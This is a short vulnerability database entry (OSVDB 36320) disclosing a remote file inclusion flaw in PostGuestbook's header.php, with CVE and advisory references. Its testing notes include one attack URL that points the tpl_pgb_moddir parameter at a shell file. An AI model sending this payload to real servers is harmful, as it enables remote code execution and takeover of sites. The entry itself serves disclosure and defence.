PostGuestbook styles/internal/header.php tpl_pgb_moddir Variable Remote File Inclusion

2007-03-07T00:00:00
ID OSVDB:36320
Type osvdb
Reporter GloD_M()
Modified 2007-03-07T00:00:00

Description

Manual Testing Notes

http://[target]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=Shell.php?

References:

ISS X-Force ID: 32866 Generic Exploit URL: http://www.milw0rm.com/exploits/3423 FrSIRT Advisory: ADV-2007-0880 CVE-2007-1372 Bugtraq ID: 22858